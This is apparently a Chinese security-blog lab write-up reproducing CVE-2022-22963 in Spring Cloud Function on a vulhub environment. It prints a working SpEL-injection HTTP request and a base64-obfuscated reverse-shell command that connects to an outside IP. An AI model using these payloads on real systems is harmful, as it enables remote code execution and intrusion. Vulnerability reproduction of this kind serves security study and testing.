freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

CVE-2022-22963 代码远程执行漏洞复现
小菜鸡 2022-09-20 16:09:37 520044
所属地 山东省

漏洞简介:

由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。

影响版本:

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

一、复现工具:

1.docker+vulhub

2.burpsuite

3.一台vps(虚拟机也可以)

docker跟vulhub安装下载就不说了,网上多的是,下面启动漏洞环境的命令

systemctl start docker 启动docker

docker-compose up -d启动漏洞环境

docker-compose down 删除漏洞环境

二、漏洞验证

1.访问8080端口

2.访问/uppercase抓包

3.更改为post包,添加post包信息

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Upgrade-Insecure-Requests: 1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/webroot")
Content-Type: text/plain
Content-Length: 25

Content-Length: 7

test

4.创建成功

三、反弹 shell

1.把touch /tmp/webroot修改为反弹shell的命令

"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTIuMjI0LjIxLjE1OC8yNjI2IDA+JjE=}|{base64,-d}|{bash,-i}

2.反弹成功

# 工具 # linux # 漏洞复现 # 漏洞复现环境
本文为 小菜鸡 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
小菜鸡 LV.2
他很懒,什么都没留下
  • 3 文章数
  • 2 关注者
CVE-2022-22965远程代码执行漏洞复现
2022-09-20
CVE-2018-1273远程命令执行漏洞复现
2022-09-07
文章目录